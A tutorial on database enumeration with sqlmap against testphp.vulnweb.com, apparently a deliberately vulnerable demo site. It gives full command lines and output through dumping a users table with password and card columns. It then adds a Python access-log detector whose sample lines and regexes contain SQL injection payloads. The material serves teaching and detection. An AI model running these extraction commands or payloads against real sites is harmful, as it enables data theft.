
Database enumeration techniques with sqlmap

Let's see how to enumerate databases and tables with sqlmap

Database enumeration with sqlmap

We will now look at a few enumeration techniques for extracting useful information from the database.
To gather more information about the services our web application is connected to, we can use the options:

  • --banner
  • --fingerprint

Similarly, to obtain the list of users and passwords:

  • --users
  • --passwords

To check whether the database user is an administrator:

  • --is-dba

NOTE: not all of this information is always accessible. We will now see how to extract the contents of the database step by step. Start by specifying the "--dbs" option to obtain the list of available databases:

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql --dbs
...

[12:47:32] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:47:32] [INFO] fetching database names 
[12:47:32] [INFO] the SQL query used returns 3 entries 
[12:47:33] [INFO] retrieved: information_schema 
[12:47:33] [INFO] retrieved: acuart 
[12:47:33] [INFO] retrieved: modrewriteShop 
available databases [3]: 
[*] acuart 
[*] information_schema 
[*] modrewriteShop 

[12:47:33] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:47:33

To enumerate the tables of the "acuart" database, add the options "-D acuart --tables" to the previous command:

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart --tables
[...]

[12:48:46] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:48:46] [INFO] fetching tables for database 'acuart' 
[12:48:46] [INFO] the SQL query used returns 7 entries 
[12:48:46] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: artists 
[12:48:47] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: carts 
[12:48:47] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: categ 
[12:48:47] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: featured 
[12:48:48] [INFO] retrieved: acuart 
[12:48:48] [INFO] retrieved: guestbook 
[12:48:48] [INFO] retrieved: acuart 
[12:48:48] [INFO] retrieved: pictures 
[12:48:48] [INFO] retrieved: acuart 
[12:48:48] [INFO] retrieved: users 
Database: acuart 
[7 tables] 
+-----------+ 
| artists   | 
| carts     | 
| categ     | 
| featured  | 
| guestbook | 
| pictures  | 
| users     | 
+-----------+ 

[12:48:48] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:48:48

Now the list of columns can be obtained with the "--columns" option:

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --columns
[...]

[12:49:27] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:49:27] [INFO] fetching columns for table 'users' on database 'acuart' 
[12:49:27] [INFO] the SQL query used returns 8 entries 
[12:49:28] [INFO] retrieved: uname 
[12:49:28] [INFO] retrieved: varchar(100) 
[12:49:28] [INFO] retrieved: pass 
[12:49:28] [INFO] retrieved: varchar(100) 
[12:49:28] [INFO] retrieved: cc 
[12:49:28] [INFO] retrieved: varchar(100) 
[12:49:28] [INFO] retrieved: address 
[12:49:29] [INFO] retrieved: mediumtext 
[12:49:29] [INFO] retrieved: email 
[12:49:29] [INFO] retrieved: varchar(100) 
[12:49:29] [INFO] retrieved: name 
[12:49:29] [INFO] retrieved: varchar(100) 
[12:49:29] [INFO] retrieved: phone 
[12:49:29] [INFO] retrieved: varchar(100) 
[12:49:30] [INFO] retrieved: cart 
[12:49:30] [INFO] retrieved: varchar(100) 
Database: acuart 
Table: users 
[8 columns] 
+---------+--------------+ 
| Column  | Type         | 
+---------+--------------+ 
| address | mediumtext   | 
| cart    | varchar(100) | 
| cc      | varchar(100) | 
| email   | varchar(100) | 
| name    | varchar(100) | 
| pass    | varchar(100) | 
| phone   | varchar(100) | 
| uname   | varchar(100) | 
+---------+--------------+ 

[12:49:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:49:30

Finally, we retrieve the contents of the database, limiting ourselves to the first two tuples with the option "--dump --start 1 --stop 3":

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --dump --start 1 --stop 5
[...]

[12:59:19] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:59:19] [INFO] fetching columns for table 'users' on database 'acuart' 
[12:59:19] [INFO] the SQL query used returns 8 entries 
[12:59:20] [INFO] retrieved: uname 
[12:59:20] [INFO] retrieved: varchar(100) 
[12:59:20] [INFO] retrieved: pass 
[12:59:20] [INFO] retrieved: varchar(100) 
[12:59:20] [INFO] retrieved: cc 
[12:59:20] [INFO] retrieved: varchar(100) 
[12:59:20] [INFO] retrieved: address 
[12:59:21] [INFO] retrieved: mediumtext 
[12:59:21] [INFO] retrieved: email 
[12:59:21] [INFO] retrieved: varchar(100) 
[12:59:21] [INFO] retrieved: name 
[12:59:21] [INFO] retrieved: varchar(100) 
[12:59:21] [INFO] retrieved: phone 
[12:59:21] [INFO] retrieved: varchar(100) 
[12:59:22] [INFO] retrieved: cart 
[12:59:22] [INFO] retrieved: varchar(100) 
[12:59:22] [INFO] fetching entries for table 'users' on database 'acuart' 
[12:59:22] [INFO] retrieved: cacucko 
[12:59:22] [INFO] retrieved: cacucko 
[12:59:22] [INFO] retrieved: cacucko 
[12:59:22] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: hacked by cacucko! 
[12:59:23] [INFO] retrieved: Russian hackers! 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: gopala 
[12:59:24] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa 
[12:59:24] [INFO] retrieved: test 
[12:59:24] [INFO] retrieved: gopala 
[12:59:24] [INFO] retrieved: gopala 
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n 
Database: acuart 
Table: users 
[2 entries] 
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ 
| address            | cart                             | cc      | email            | name    | pass   | phone   | uname  | 
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ 
| hacked by cacucko! | 1b90caf669e05660efdf1d23b48100fa | cacucko | Russian hackers! | cacucko | gopala | cacucko | gopala | 
| gopala             | 1b90caf669e05660efdf1d23b48100fa | gopala  | gopala           | gopala  | gopala | gopala  | test   | 
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ 

[12:59:30] [INFO] Table 'acuart.users' dumped to CSV file '/home/user/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv' 
[12:59:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:59:30
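From the defender's side, each step above (--dbs, --tables, --columns, --dump) shows up in the web server's access log as a burst of requests to the same script with injection payloads in the query string (catalog reads from information_schema, UNION extraction, boolean and time-based probes) and, unless --random-agent was used, a "sqlmap/..." User-Agent. The script below is an added example, not part of the original article or of sqlmap: it parses combined-format access-log lines (constructed sample lines, with constructed IPs and User-Agent strings) and flags clients whose suspicious requests to one path reach a threshold.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Query-string indicators matching the enumeration steps shown above:
# catalog reads (information_schema), UNION extraction, boolean/time probes.
SQLI_RE = re.compile(
    r"(information_schema|\bunion\b.*\bselect\b|\bsleep\(|\bbenchmark\(|"
    r"\b(and|or)\b\s+\d+=\d+|'\s*(and|or)\b|--\s)",
    re.IGNORECASE,
)

def _req(ip, target, ua):  # builds one constructed log line
    return f'{ip} - - [10/Oct/2023:12:47:32 +0000] "GET {target} HTTP/1.1" 200 512 "-" "{ua}"'

SCANNER_UA = "sqlmap/1.7#stable (https://sqlmap.org)"  # constructed sample value
BROWSER_UA = "Mozilla/5.0"
SAMPLE_LOG = [  # constructed: two benign requests, six enumeration probes from one client
    _req("198.51.100.4", "/listproducts.php?cat=1", BROWSER_UA),
    _req("198.51.100.4", "/search.php?q=red%20and%20blue", BROWSER_UA),
    _req("203.0.113.7", "/listproducts.php?cat=1%20AND%201%3D1", SCANNER_UA),
    _req("203.0.113.7", "/listproducts.php?cat=1%20AND%201%3D2", SCANNER_UA),
    _req("203.0.113.7", "/listproducts.php?cat=1%20UNION%20SELECT%20NULL%2Cschema_name%20FROM%20information_schema.schemata", BROWSER_UA),
    _req("203.0.113.7", "/listproducts.php?cat=1%20UNION%20SELECT%20NULL%2Ctable_name%20FROM%20information_schema.tables", BROWSER_UA),
    _req("203.0.113.7", "/listproducts.php?cat=1%27%20AND%20SLEEP(5)--%20", BROWSER_UA),
    _req("203.0.113.7", "/listproducts.php?cat=1%20ORDER%20BY%2010--%20", BROWSER_UA),
]

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_suspicious(entry):
    """True when the User-Agent or the decoded query string carries injection indicators."""
    if "sqlmap" in entry["ua"].lower():
        return True
    return bool(SQLI_RE.search(unquote_plus(urlsplit(entry["target"]).query)))

def detect_enumeration(lines, threshold=5):
    """Map (client IP, path) -> suspicious request count, keeping only counts at or above threshold."""
    hits = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry and is_suspicious(entry):
            hits[(entry["ip"], urlsplit(entry["target"]).path)] += 1
    return {key: n for key, n in hits.items() if n >= threshold}
```

The payload check catches the probes even when the scanner hides its User-Agent; the per-path threshold keeps a single odd query from raising an alert on its own.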
